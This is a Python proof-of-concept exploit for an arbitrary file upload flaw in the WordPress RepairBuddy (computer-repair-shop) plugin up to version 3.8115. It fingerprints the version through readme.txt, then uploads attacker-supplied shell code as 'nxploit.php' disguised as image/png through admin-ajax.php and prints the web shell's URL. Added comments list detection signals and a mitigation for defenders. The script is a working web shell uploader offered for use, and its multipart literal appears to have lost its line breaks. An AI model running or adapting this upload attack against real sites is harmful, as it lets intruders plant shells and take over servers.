# Proof-of-concept script for the arbitrary file upload in the WordPress
# RepairBuddy plugin (plugin directory "computer-repair-shop"), described by
# the argparse text below as affecting versions <= 3.8115.
#
# What the script does, in order:
#   1. GET  <url>wp-content/plugins/computer-repair-shop/readme.txt and look
#      for the literal text "Stable tag: 3.8115".
#   2. POST <url>wp-admin/admin-ajax.php with a multipart body whose "action"
#      field is "wc_upload_file_ajax" and whose "file" part is named
#      "nxploit.php" but declared as Content-Type image/png.
#
# Observables for defenders (all taken from the requests built below):
#   - a readme.txt fetch for this plugin followed by an admin-ajax.php POST
#     from the same client;
#   - multipart uploads where the filename extension (.php) disagrees with the
#     declared part type (image/png);
#   - the POST carries no session cookie or nonce field, only a spoofed
#     Referer/Origin and the fixed browser User-Agent defined below.
# Mitigation: move to a plugin release newer than 3.8115 (the fixed version is
# not stated on this page; confirm against the vendor advisory) and deny
# script execution in upload directories.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import re

# Every request below uses verify=False, so TLS certificates are not
# validated; this call only silences the warning urllib3 would print for that.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Fixed desktop-Chrome User-Agent sent on both the probe and the upload.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"


def print_banner():
    """Print the author's ASCII-art banner to stdout."""
    # NOTE(review): the banner literal is kept exactly as it appears on the
    # page, where its line breaks appear to have been lost in extraction.
    banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@@@@@ @@@ @@@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@@@@ @@@@ @@@@@@@@ @@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! !@@ @@@!! @@! @@! @@@ @@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! !@! !@! !@! @!@ @!@ !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ !!@@!! @!@ @!! !!@!!@!! @!@!!@ !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! @!!@!!! !@! !!! !!@!!! !!@!@! :!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !:! !!: !!: !!! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:! :!: :!: !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: :::: :: ::: :: ::::: :: :: :::: :: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: : : :: : : : : : : : : Exploit By : Nxploit Khaled Alenazi, """
    print(banner)


def check_vulnerability(url):
    """Report whether the plugin readme under *url* advertises version 3.8115.

    Returns True only when the readme.txt request answers HTTP 200 and the
    body contains the literal text 'Stable tag: 3.8115'; returns False for
    any other response and for any exception raised while requesting.
    """
    # The publicly readable readme.txt is what discloses the installed
    # version here; restricting access to plugin readme files removes this
    # fingerprinting signal (it does not fix the upload flaw itself).
    readme_url = f"{url}wp-content/plugins/computer-repair-shop/readme.txt"
    try:
        response = requests.get(readme_url, headers={'User-Agent': user_agent}, verify=False)
        if response.status_code == 200 and 'Stable tag: 3.8115' in response.text:
            print("🎯 The site is vulnerable. Proceeding with the exploit...")
            return True
        else:
            print("❌ The site is not vulnerable.")
            return False
    except Exception as e:
        # Any failure (DNS, TLS, connection, ...) is reported and treated as
        # "not vulnerable".
        print(f"Error checking vulnerability: {e}")
        return False


def prepare_headers(url):
    """Build the header dict for the admin-ajax.php upload request.

    The headers imitate an XMLHttpRequest issued from the wp-admin
    "rep_estimates" editor page (Referer, Origin, X-Requested-With). No
    cookie or authorization header is included.
    """
    return {
        'User-Agent': user_agent,
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': f"{url}wp-admin/post-new.php?post_type=rep_estimates",
        'X-Requested-With': 'XMLHttpRequest',
        # The boundary is hard-coded and must match the one used in
        # prepare_data().
        'Content-Type': 'multipart/form-data; boundary=---------------------------26318640401773937217773873037',
        'Origin': url,
        'Connection': 'keep-alive'
    }


def prepare_data(shell_code):
    """Return the multipart/form-data body with *shell_code* as the file part.

    The body has two parts: "file" (filename "nxploit.php", declared as
    image/png) and "action" with the value "wc_upload_file_ajax". The
    extension/type mismatch in the "file" part is a usable detection signal
    for upload filters and WAF rules.
    """
    # NOTE(review): the literal is kept exactly as it appears on the page,
    # where the line breaks between multipart headers and values appear to
    # have been lost in extraction.
    return f""" -----------------------------26318640401773937217773873037 Content-Disposition: form-data; name="file"; filename="nxploit.php" Content-Type: image/png {shell_code} -----------------------------26318640401773937217773873037 Content-Disposition: form-data; name="action" wc_upload_file_ajax -----------------------------26318640401773937217773873037-- """


def extract_shell_url(response_text):
    """Return the first URL in *response_text* ending in 'nxploit.php', or None.

    The match starts at 'http' and runs over non-whitespace characters up to
    'nxploit.php'; backslashes are then removed from the match.
    """
    match = re.search(r'http[^\s]+nxploit\.php', response_text)
    if match:
        # presumably the response is JSON with escaped slashes ("\/");
        # confirm against an actual plugin response
        return match.group(0).replace("\\", "")
    return None


def upload_shell(url, shell_code):
    """POST the multipart body to admin-ajax.php and print the outcome.

    Prints the raw response body, then treats any HTTP 200 as a successful
    upload and tries to extract the stored file's URL from the response.
    Returns None; exceptions from the request are caught and printed.
    """
    upload_url = f"{url}wp-admin/admin-ajax.php"
    headers = prepare_headers(url)
    data = prepare_data(shell_code)
    try:
        # The body is sent as a pre-built string, so the Content-Type header
        # from prepare_headers() is what declares it as multipart.
        response = requests.post(upload_url, headers=headers, data=data, verify=False)
        print(f"Response: {response.text}")
        if response.status_code == 200:
            print("✅ Shell uploaded successfully.")
            shell_url = extract_shell_url(response.text)
            if shell_url:
                print(f"🔗 Shell URL: {shell_url}")
            else:
                print("❌ Failed to extract shell URL.")
        else:
            print("❌ Failed to upload the shell.")
    except Exception as e:
        print(f"Error uploading shell: {e}")


def main():
    """Parse the command line, run the version probe, then the upload."""
    parser = argparse.ArgumentParser(description='WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.')
    parser.add_argument('-u', '--url', required=True,
                        help='Target URL')
    # Defaults to an empty string, i.e. an empty file body when omitted.
    parser.add_argument('-shell', default='', help='Shell code to upload')
    args = parser.parse_args()
    url = args.url
    shell_code = args.shell
    # All request URLs are built by plain concatenation, so the base URL
    # must end in '/'.
    if not url.endswith('/'):
        url += '/'
    print_banner()
    # The upload is attempted only when the readme probe reported 3.8115.
    if check_vulnerability(url):
        upload_shell(url, shell_code)


if __name__ == "__main__":
    main()